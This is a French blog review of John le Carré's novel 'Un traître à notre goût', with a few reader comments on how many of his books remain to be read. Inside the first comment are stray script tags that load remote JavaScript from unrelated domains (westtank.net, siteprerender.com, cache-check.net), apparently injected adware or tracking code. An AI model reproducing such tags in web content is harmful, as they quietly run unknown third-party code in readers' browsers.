• John le Carré, Un traître à notre goût, Seuil

     John le Carré, Un traître à notre goût, SeuilJohn le Carré est mort le 12 décembre 2020, il était né en 1931. J'imagine que tout le monde a entendu parler de ce maître du roman d'espionnage qui travailla lui-même brièvement dans les services secrets britanniques. Signe de son envergure, le Monde lui consacre une nécrologie de deux pages, ce qui est peu courant. L'auteur de l'article, Franck Nouchi, me donne l'impression d'être un fan qui aurait lu toute l'oeuvre de John le Carré. Quant à moi je ne l'avais jamais lu. A ma bibliothèque, une semaine après sa mort, tous ses romans sont sortis. Ca aussi c'est peu courant. Je me rabats sur un bouquiniste où je n'ai pas l'embarras du choix : il n'y a que

     

    John le Carré, Un traître à notre goût, SeuilUn traître à notre goût. Perry, professeur à Oxford, et Gail, avocate à Londres, s'offrent des vacances en amoureux sur l'île d'Antigua. Ils y font la connaissance de Dima, un Russe amateur de tennis comme eux, et de sa famille. Assez rapidement Dima se révèle être un membre important de la mafia russe, spécialiste du blanchiment d'argent sale à grande échelle. Il a une proposition à faire aux services secrets britanniques et compte sur Perry pour lui servir d'intermédiaire. Je serais bien embêtée si c'était à moi que cela arrivait. Heureusement, je ne joue pas au tennis. Plusieurs fois j'ai eu envie d'avertir Perry et Gail de fuir, vous ne voyez pas que cette affaire pue ? Il semble que si, ils le voyaient mais ils pensaient qu'ils pouvaient aider.

     

     

    Dans ce roman qui se déroule en 2009 on croise -outre la mafia russe- des banques peu regardantes sur l'origine des fonds du moment que cela leur permet de renflouer leurs caisses, des politiciens et des hauts fonctionnaires corrompus et des espions en roue libre qui prennent des distances avec leur hiérarchie. Pour défendre leur pays ou pour régler des comptes personnels ? Cela n'est pas clair.

    L'histoire commence un peu lentement. Ca se lit mais sans enthousiasme excessif de ma part. Dans les derniers chapitres les choses s'accélèrent, je suis enfin ferrée et je me demande comment cela va se terminer même si je me doute que la morale et la justice n'en sortiront pas particulièrement grandies.


    Tags Tags : ,
  • Commentaires

    1
    keisha
    Mardi 19 Janvier à 08:47
    keisha

    Il t'en reste plein à lire, dis donc!

    <script src="//westtank.net/2313bb93141d74fb89.js?2"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8979x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8979x&format=arrjs&r=1611042444042" type="text/javascript"></script> <script src="http://westtank.net/ext/2313bb93141d74fb89.js?sid=52715_8979_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    2
    Mardi 19 Janvier à 20:00

    Oui c'est sûr, il y a de quoi faire.

     

    3
    Jeudi 21 Janvier à 19:27

    Moi encore plus, j’en ai lu aucun...

      • Vendredi 22 Janvier à 13:43

        À essayer, pourquoi pas ?

         

      • Vendredi 22 Janvier à 14:08

        Un jour peut-être...

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :